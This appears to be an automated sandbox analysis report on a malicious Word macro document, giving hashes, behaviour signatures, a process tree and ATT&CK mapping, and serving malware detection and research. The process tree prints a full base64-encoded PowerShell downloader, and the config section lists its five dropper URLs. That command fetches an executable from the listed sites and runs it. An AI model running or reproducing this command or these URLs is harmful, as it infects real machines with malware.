Analysis

  • max time kernel
    111s
  • max time network
    70s
  • platform
    windows7_x64
  • resource
    win7-20220718-en
  • resource tags

    arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
  • submitted
    24-07-2022 20:32

General

  • Target

    a66b5982e41c8e78c0a807d5c1e7ecf9d554b941fad99bb856564e4ddbb5d295.doc

  • Size

    149KB

  • MD5

    35b1085d0874798babcc94a2b350ad7d

  • SHA1

    0d7ff87a0e1067a0dea89ee3b4969469c87d03de

  • SHA256

    a66b5982e41c8e78c0a807d5c1e7ecf9d554b941fad99bb856564e4ddbb5d295

  • SHA512

    7983baa8d37189bd82eab5947229bf82d1460b8fe9d4e77e4cbeb894e8b584e94bfa9c17102f755cecdd06c5013ebd1eb4531ed5c4e218fd1e20ceccea09641b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.wholesale-towels.com/caapa/2skq2c8brl_ujstqor-9423/

exe.dropper

https://sehatmadu.com/wp-admin/sMsnqVEHO/

exe.dropper

http://wayuansudamai.com/wp-includes/tUhChhCpcN/

exe.dropper

http://vnilla.com/cgi-bin/xdmlv_90ij5qu1-86492/

exe.dropper

http://vcontenidos.com/wp-admin/nzxnfyy9_x7u5tyux4w-71288/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a66b5982e41c8e78c0a807d5c1e7ecf9d554b941fad99bb856564e4ddbb5d295.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1516
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1728
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -nop -e JABpADkASQA5AGwATQBJAD0AJwB2ADQANgBIAFcAcwA1ACcAOwAkAHoAOQBLADAAUwBNACAAPQAgACcAOQA4ADUAJwA7ACQATQB1AHoAdAA4AFUAaQA9ACcAegBBAHIAVgBrAGYAJwA7ACQAVQA0AEkASwA1AEQAdABVAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB6ADkASwAwAFMATQArACcALgBlAHgAZQAnADsAJABpAGIAUwA4AEIAMABuAD0AJwBGAEkAbABQAFIAXwBFACcAOwAkAGMARgBBAFMAcwBZAEgAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAE4ARQB0AC4AYABXAGUAQgBgAEMATABpAGAAZQBOAFQAOwAkAGoAMgBjAFEAVwB6AEMAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHcAaABvAGwAZQBzAGEAbABlAC0AdABvAHcAZQBsAHMALgBjAG8AbQAvAGMAYQBhAHAAYQAvADIAcwBrAHEAMgBjADgAYgByAGwAXwB1AGoAcwB0AHEAbwByAC0AOQA0ADIAMwAvAEAAaAB0AHQAcABzADoALwAvAHMAZQBoAGEAdABtAGEAZAB1AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBzAE0AcwBuAHEAVgBFAEgATwAvAEAAaAB0AHQAcAA6AC8ALwB3AGEAeQB1AGEAbgBzAHUAZABhAG0AYQBpAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwB0AFUAaABDAGgAaABDAHAAYwBOAC8AQABoAHQAdABwADoALwAvAHYAbgBpAGwAbABhAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AeABkAG0AbAB2AF8AOQAwAGkAagA1AHEAdQAxAC0AOAA2ADQAOQAyAC8AQABoAHQAdABwADoALwAvAHYAYwBvAG4AdABlAG4AaQBkAG8AcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgB6AHgAbgBmAHkAeQA5AF8AeAA3AHUANQB0AHkAdQB4ADQAdwAtADcAMQAyADgAOAAvACcALgBzAFAAbABJAHQAKAAnAEAAJwApADsAJABsAHcATwBNAG8AQwBHAEYAPQAnAEwAaABWAG0AUwBFAE8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAHoAXwBpAG8AOQBwACAAaQBuACAAJABqADIAYwBRAFcAegBDACkAewB0AHIAeQB7ACQAYwBGAEEAUwBzAFkASAAuAEQATwBXAG4AbABPAGEAZABmAGkAbABlACgAJAB6AF8AaQBvADkAcAAsACAAJABVADQASQBLADUARAB0AFUAKQA7ACQAWQBOAHYASwA2AGkATwBhAD0AJwBsAEEAbgBqAHcAegBRAFoAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABVADQASQBLADUARAB0AFUAKQAuAEwAZQBOAGcAVABIACAALQBnAGUAIAAyADkANQAxADIAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAFIAVAAoACQAVQA0AEkASwA1AEQAdABVACkAOwAkAHIAOABEAE0AbQA3AD0AJwBQAEwARABiAEgAUwBrACcAOwBiAHIAZQBhAGsAOwAkAFEAdABhAG4AbQBSAE0APQAnAHcAagAxAEIAcAB2AHYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATwBzADAAUwBpAGMANAA9ACcAaQBqAGoAUQBMAHoAbgAnAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:980

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/980-72-0x000007FEF4690000-0x000007FEF50B3000-memory.dmp
      Filesize

      10.1MB

    • memory/980-78-0x000000000278B000-0x00000000027AA000-memory.dmp
      Filesize

      124KB

    • memory/980-77-0x0000000002784000-0x0000000002787000-memory.dmp
      Filesize

      12KB

    • memory/980-76-0x000000000278B000-0x00000000027AA000-memory.dmp
      Filesize

      124KB

    • memory/980-75-0x000000001B730000-0x000000001BA2F000-memory.dmp
      Filesize

      3.0MB

    • memory/980-73-0x000007FEF3B30000-0x000007FEF468D000-memory.dmp
      Filesize

      11.4MB

    • memory/980-74-0x0000000002784000-0x0000000002787000-memory.dmp
      Filesize

      12KB

    • memory/1516-69-0x0000000000477000-0x000000000048B000-memory.dmp
      Filesize

      80KB

    • memory/1516-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1516-63-0x0000000000477000-0x000000000048B000-memory.dmp
      Filesize

      80KB

    • memory/1516-62-0x0000000000477000-0x000000000048B000-memory.dmp
      Filesize

      80KB

    • memory/1516-65-0x0000000000477000-0x000000000048B000-memory.dmp
      Filesize

      80KB

    • memory/1516-54-0x0000000072C11000-0x0000000072C14000-memory.dmp
      Filesize

      12KB

    • memory/1516-68-0x0000000000477000-0x000000000048B000-memory.dmp
      Filesize

      80KB

    • memory/1516-70-0x0000000000477000-0x000000000048B000-memory.dmp
      Filesize

      80KB

    • memory/1516-61-0x000000007167D000-0x0000000071688000-memory.dmp
      Filesize

      44KB

    • memory/1516-80-0x000000007167D000-0x0000000071688000-memory.dmp
      Filesize

      44KB

    • memory/1516-79-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1516-58-0x000000007167D000-0x0000000071688000-memory.dmp
      Filesize

      44KB

    • memory/1516-57-0x0000000076201000-0x0000000076203000-memory.dmp
      Filesize

      8KB

    • memory/1516-64-0x0000000000477000-0x000000000048B000-memory.dmp
      Filesize

      80KB

    • memory/1516-55-0x0000000070691000-0x0000000070693000-memory.dmp
      Filesize

      8KB

    • memory/1728-59-0x0000000000000000-mapping.dmp
    • memory/1728-60-0x000007FEFC2C1000-0x000007FEFC2C3000-memory.dmp
      Filesize

      8KB